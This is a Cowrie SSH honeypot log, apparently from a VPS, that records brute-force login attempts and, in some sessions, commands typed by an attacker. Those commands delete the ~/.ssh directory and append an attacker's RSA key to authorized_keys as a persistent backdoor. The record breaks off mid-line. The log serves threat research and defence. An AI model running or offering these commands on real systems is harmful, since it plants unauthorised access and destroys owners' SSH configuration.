{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:30:04.082850Z","src_ip":"212.227.235.229","session":"dadc967a6153"}
{"eventid":"cowrie.login.failed","username":"shiv","password":"shiv123","message":"login attempt [shiv/shiv123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:30:05.134757Z","src_ip":"212.227.235.229","session":"dadc967a6153"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:06.390171Z","src_ip":"212.227.235.229","session":"dadc967a6153"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":39084,"dst_ip":"1.2.3.4","dst_port":22,"session":"b37bf97291a7","protocol":"ssh","message":"New connection: 68.183.87.241:39084 (1.2.3.4:22) [session: b37bf97291a7]","sensor":"my-vps","timestamp":"2025-08-26T04:30:18.261767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:30:18.262703Z","src_ip":"68.183.87.241","session":"b37bf97291a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:30:18.538735Z","src_ip":"68.183.87.241","session":"b37bf97291a7"}
{"eventid":"cowrie.login.failed","username":"tcuser","password":"tcuser123","message":"login attempt [tcuser/tcuser123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:30:19.683792Z","src_ip":"68.183.87.241","session":"b37bf97291a7"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:20.964138Z","src_ip":"68.183.87.241","session":"b37bf97291a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57374,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d93a4dc0c44","protocol":"ssh","message":"New connection: 212.227.235.229:57374 (1.2.3.4:22) [session: 3d93a4dc0c44]","sensor":"my-vps","timestamp":"2025-08-26T04:30:36.017817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-26T04:30:36.958737Z","src_ip":"212.227.235.229","session":"3d93a4dc0c44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50220,"dst_ip":"1.2.3.4","dst_port":22,"session":"940ae4808100","protocol":"ssh","message":"New connection: 212.227.235.229:50220 (1.2.3.4:22) [session: 940ae4808100]","sensor":"my-vps","timestamp":"2025-08-26T04:30:38.169194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:30:38.170527Z","src_ip":"212.227.235.229","session":"940ae4808100"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-26T04:30:38.190209Z","src_ip":"212.227.235.229","session":"3d93a4dc0c44"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:30:40.006734Z","src_ip":"212.227.235.229","session":"940ae4808100"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36216,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a07aa76eaaf","protocol":"ssh","message":"New connection: 212.227.235.229:36216 (1.2.3.4:22) [session: 7a07aa76eaaf]","sensor":"my-vps","timestamp":"2025-08-26T04:30:40.599526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:30:40.600622Z","src_ip":"212.227.235.229","session":"7a07aa76eaaf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:30:40.673088Z","src_ip":"212.227.235.229","session":"7a07aa76eaaf"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc1234567","message":"login attempt [root/Abc1234567] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:30:40.855568Z","src_ip":"212.227.235.229","session":"940ae4808100"}
{"eventid":"cowrie.login.success","username":"root","password":"root123456","message":"login attempt [root/root123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:30:41.003244Z","src_ip":"212.227.235.229","session":"7a07aa76eaaf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:30:41.200229Z","src_ip":"212.227.235.229","session":"7a07aa76eaaf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:30:41.201003Z","src_ip":"212.227.235.229","session":"7a07aa76eaaf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:30:41.201840Z","src_ip":"212.227.235.229","session":"7a07aa76eaaf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:43.069488Z","src_ip":"212.227.235.229","session":"7a07aa76eaaf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:30:43.128281Z","src_ip":"212.227.235.229","session":"940ae4808100"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:30:43.128948Z","src_ip":"212.227.235.229","session":"940ae4808100"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:30:43.130194Z","src_ip":"212.227.235.229","session":"940ae4808100"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:30:43.222806Z","src_ip":"212.227.235.229","session":"7a07aa76eaaf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:30:43.223517Z","src_ip":"212.227.235.229","session":"7a07aa76eaaf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:30:43.297781Z","src_ip":"212.227.235.229","session":"7a07aa76eaaf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:43.298605Z","src_ip":"212.227.235.229","session":"7a07aa76eaaf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36218,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e902ba010d1","protocol":"ssh","message":"New connection: 212.227.235.229:36218 (1.2.3.4:22) [session: 9e902ba010d1]","sensor":"my-vps","timestamp":"2025-08-26T04:30:43.374066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:30:43.375024Z","src_ip":"212.227.235.229","session":"9e902ba010d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:43.400657Z","src_ip":"212.227.235.229","session":"940ae4808100"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:30:43.452010Z","src_ip":"212.227.235.229","session":"9e902ba010d1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:30:43.803211Z","src_ip":"212.227.235.229","session":"9e902ba010d1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:30:43.998487Z","src_ip":"212.227.235.229","session":"940ae4808100"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:30:43.999300Z","src_ip":"212.227.235.229","session":"940ae4808100"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:30:44.270162Z","src_ip":"212.227.235.229","session":"940ae4808100"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:44.271203Z","src_ip":"212.227.235.229","session":"940ae4808100"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:44.275346Z","src_ip":"212.227.235.229","session":"3d93a4dc0c44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41282,"dst_ip":"1.2.3.4","dst_port":22,"session":"6723f96c1afa","protocol":"ssh","message":"New connection: 212.227.235.229:41282 (1.2.3.4:22) [session: 6723f96c1afa]","sensor":"my-vps","timestamp":"2025-08-26T04:30:44.540048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:30:44.541248Z","src_ip":"212.227.235.229","session":"6723f96c1afa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:30:44.810732Z","src_ip":"212.227.235.229","session":"6723f96c1afa"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:44.883115Z","src_ip":"212.227.235.229","session":"9e902ba010d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36228,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9a37c432e95","protocol":"ssh","message":"New connection: 212.227.235.229:36228 (1.2.3.4:22) [session: f9a37c432e95]","sensor":"my-vps","timestamp":"2025-08-26T04:30:44.952943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:30:44.953670Z","src_ip":"212.227.235.229","session":"f9a37c432e95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffi